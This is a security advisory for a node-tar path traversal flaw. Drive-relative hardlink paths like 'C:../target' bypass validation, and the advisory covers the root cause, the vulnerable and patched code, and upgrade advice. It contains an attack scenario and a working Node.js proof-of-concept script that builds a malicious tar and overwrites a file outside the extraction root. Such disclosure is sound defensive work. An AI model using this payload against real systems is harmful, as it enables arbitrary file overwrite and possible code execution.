GHSA-qffp-2rhf-9h96: Hardlink Path Traversal in node-tar via Drive-Relative Paths

The node-tar library, a widely used implementation of the tar archive format for Node.js, contains a path traversal vulnerability within its archive extraction logic. The flaw specifically affects the handling of hardlink entries (Link type) that utilize drive-relative paths—a path format primarily associated with Windows filesystems but interpretable by the library's path logic.

When a tar archive is extracted, the library attempts to sanitize file paths to prevent directory traversal attacks (writing files outside the intended destination). However, a logical error in the sanitization order allows specific path patterns, such as C:../target, to bypass validation checks. This results in the extraction of hardlinks that point to locations outside the designated extraction root.

Successful exploitation grants an attacker an arbitrary file overwrite primitive. If the process running the extraction has write permissions to sensitive system files or application code, this vulnerability can lead to Remote Code Execution (RCE) or Denial of Service (DoS) by corrupting critical files.

The root cause of this vulnerability lies in the incorrect ordering of path validation and normalization operations within the Unpack class in src/unpack.ts. The library attempts to identify malicious paths by checking for directory traversal segments (..) before fully normalizing the path structure.

The vulnerable logic proceeds in the following sequence:

1. Path Splitting: The input path (e.g., C:../target) is split by the forward slash separator /. This results in the array ['C:..', 'target'].
2. Ineffective Validation: The code checks if any segment in the array equals the literal string '..'. Since 'C:..' is not equal to '..', the traversal check passes successfully.
3. Root Stripping: After the check, the function stripAbsolutePath() is called. This function correctly identifies C: as a drive root and removes it to prevent absolute path usage.
4. Traversal Introduction: The stripping operation effectively transforms C:../target into ../target.

Because the path was modified after the security check, the resulting path contains a valid traversal sequence that was never validated. The library subsequently uses this path to create a hardlink, resolving it relative to the current working directory and allowing access to the parent directory.

The fix involves reordering the sanitization steps to ensure that the path is normalized (root stripped and slashes unified) before the traversal check occurs. The following analysis compares the vulnerable implementation with the patched version in commit 7bc755dd85e623c0279e08eb3784909e6d7e4b9f.

Vulnerable Code (Simplified Logic):

// The check happens BEFORE stripping the root
const parts = p.split('/');
if (parts.includes('..')) {
  return false; // Check fails to catch 'C:..'
}
 
// Root is stripped AFTER the check
const [root, stripped] = stripAbsolutePath(p);
// 'stripped' is now '../target', which is unsafe

Patched Code:

// 1. Strip the root FIRST
const [root, stripped] = stripAbsolutePath(p);
 
// 2. Normalize backslashes to forward slashes
// This handles cases like 'C:..\' on Windows
const normalized = stripped.replace(/\\/g, '/');
 
// 3. Split and check for traversal segments
const parts = normalized.split('/');
if (parts.includes('..')) {
  return false; // Now correctly identifies '..'
}

By stripping the absolute path root first, the input C:../target becomes ../target before the validation logic runs. The subsequent check for parts.includes('..') correctly identifies the threat and blocks the extraction.

Exploiting this vulnerability requires the attacker to create a malicious tar archive and convince a user or automated system to extract it using a vulnerable version of node-tar. The archive must contain a Link entry (Type '1') with a linkpath constructed to leverage the drive-relative bypass.

Attack Scenario:

1. Payload Creation: An attacker creates a tarball with a file entry C:../critical_config.json.
2. Delivery: The tarball is uploaded to a target application that processes user archives (e.g., an npm package registry, a backup restoration service, or a file processing pipeline).
3. Extraction: The application extracts the archive using tar.x(). The validation logic fails, and the library attempts to link the entry to ../critical_config.json relative to the extraction root.
4. Overwrite: The hardlink overwrites the target file in the parent directory.

Proof of Concept:

The following Node.js script demonstrates the creation of a malicious archive and the resulting path traversal:

const fs = require('fs');
const path = require('path');
const { Header, x } = require('tar');
 
// Setup: Target file in parent directory
const target = path.resolve(process.cwd(), '..', 'target.txt');
fs.writeFileSync(target, 'ORIGINAL');
 
// Exploit: Create tar with drive-relative linkpath
const b = Buffer.alloc(1536);
new Header({
  path: 'exploit_link',
  type: 'Link',
  linkpath: 'C:../target.txt' // The bypass payload
}).encode(b, 0);
fs.writeFileSync('poc.tar', b);
 
// Trigger: Extracting overwrites '../target.txt'
x({ cwd: process.cwd(), file: 'poc.tar' });

The impact of this vulnerability is classified as High (CVSS 8.3). The primary consequence is an integrity violation through arbitrary file overwrite. While the attack vector is local (requiring user interaction to process the file), the integrity and availability impacts are significant.

• Integrity (High): Attackers can overwrite arbitrary files writable by the user running the extraction process. This includes source code, configuration files, and system binaries.
• Availability (Low): Overwriting critical system files or application dependencies can cause the application or system to crash or behave unpredictably.
• Confidentiality (None): The vulnerability is a write-primitive (overwrite) and does not inherently allow reading of arbitrary files, though overwriting configuration files could indirectly lead to information disclosure.

The vulnerability is particularly dangerous in CI/CD pipelines, package installation scripts, and server-side applications that process untrusted tar archives.

The vulnerability has been addressed in node-tar version 7.5.10. Users should upgrade immediately to this version or higher.

Mitigation Steps:

1. Upgrade: Update the dependency in package.json and regenerate lockfiles.

   npm install tar@^7.5.10

2. Audit: Run npm audit to identify any transitive dependencies that may rely on vulnerable versions of tar.
3. Least Privilege: Ensure that processes responsible for extracting archives operate with the minimum necessary filesystem permissions. Avoid running extraction tasks as root or with write access to sensitive system directories.
4. Input Validation: Where possible, validate the contents of tar archives before extraction using a secure, sandboxed environment or by inspecting headers without extraction.